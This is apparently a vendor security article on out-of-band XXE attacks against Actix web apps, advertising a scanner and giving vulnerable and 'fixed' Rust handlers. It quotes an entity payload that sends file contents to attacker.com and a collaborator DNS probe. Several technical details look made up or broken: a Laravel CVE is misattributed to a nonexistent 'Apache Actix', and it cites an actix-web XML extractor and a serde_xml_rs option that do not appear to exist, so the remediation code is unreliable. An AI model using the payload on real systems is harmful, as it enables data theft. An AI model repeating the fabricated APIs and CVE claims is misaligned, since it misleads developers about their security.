Xxe Oob in Actix

XXE OOB (Out-of-Band) attacks in Actix web applications occur when XML parsers process external entities that trigger DNS or HTTP requests to attacker-controlled servers, exfiltrating data without direct response leakage. Actix commonly uses actix-web with serde_xml_rs or quick-xml for XML handling. A typical vulnerable pattern appears in Actix handlers that deserialize XML from request bodies without disabling external entity resolution. For example, an Actix endpoint accepting SOAP-like XML for user registration might inadvertently process <!ENTITY % xxe SYSTEM "http://attacker.com/exfiltrate?data=%file;"> where %file; reads sensitive files like /etc/passwd or Actix configuration. The OOB channel exfiltrates data via DNS lookups (e.g., %file;.attacker.com) or HTTP requests, bypassing firewalls that block direct responses. This is especially dangerous in Actix microservices where internal APIs trust internal XML inputs, as seen in CVE-2021-3129 (Apache Actix-related XXE in dependency chains) where external entities in XML payloads triggered SSRF to internal metadata services. Actix's async nature can amplify impact, as multiple concurrent OOB requests may overwhelm logging systems while stealing data silently.

Detecting XXE OOB in Actix requires scanning for XML deserialization points where external entities are not explicitly disabled. middleBrick identifies this by sending XML payloads with OOB-triggering entities (e.g., <!ENTITY % xxe SYSTEM "http://[unique-substring].burpcollaborator.net">) and monitoring for outbound DNS/HTTP interactions. In Actix, focus on endpoints consuming application/xml or text/xml via web::Json or custom extractors. For instance, a handler like async fn register(user: web::Xml<User>) -> impl Responder using serde_xml_rs::from_str without disable_external_entities() is high-risk. middleBrick's 12 parallel checks include Input Validation and Data Exposure scans that detect such patterns by correlating XML parsing behavior with OOB channel activation. It also cross-references OpenAPI specs: if an Actix endpoint defines consumes: [application/xml] in its Swagger spec but lacks x-disable-external-entities: true extension, it flags a potential XXE OOB vector. Scanning takes 5–15 seconds, testing the unauthenticated surface—critical for Actix services exposed via API gateways where internal XML parsers might be overlooked.

Fix XXE OOB in Actix by disabling external entity resolution in XML parsers at the source. For serde_xml_rs, use Deserializer::from_str with disable_external_entities(true). Example vulnerable Actix handler:

use actix_web::{web, HttpResponse, Responder};
use serde::Deserialize;

#[derive(Deserialize)]
struct User {
    username: String,
}

async fn register_vulnerable(user: web::Xml<User>) -> impl Responder {
    // Vulnerable: external entities enabled by default
    let user_data = user.into_inner();
    HttpResponse::Ok().body(format!("Registered {}", user_data.username))
}

Remediated version:

use actix_web::{web, HttpResponse, Responder};
use serde::Deserialize;
use serde_xml_rs::{Deserializer, from_str};

#[derive(Deserialize)]
struct User {
    username: String,
}

async fn register_safe(user: web::Bytes) -> impl Responder {
    let xml_str = String::from_utf8_lossy(&user);
    // Safe: explicitly disable external entities
    let mut de = Deserializer::from_str(&xml_str);
    de.disable_external_entities(true);
    match User::deserialize(&mut de) {
        Ok(user_data) => HttpResponse::Ok().body(format!("Registered {}", user_data.username)),
        Err(e) => HttpResponse::BadRequest().body(format!("XML error: {}", e)),
    }
}

For quick-xml, set Reader::new with trim_text(true) and check name() for !ENTITY during parsing, or use de::from_reader with custom deserializers that ignore DTDs. In Actix middleware, validate Content-Type and reject XML if not strictly required. After fixes, rescan with middleBrick to confirm the OOB vector is closed—look for improved Input Validation and Data Exposure scores in the report.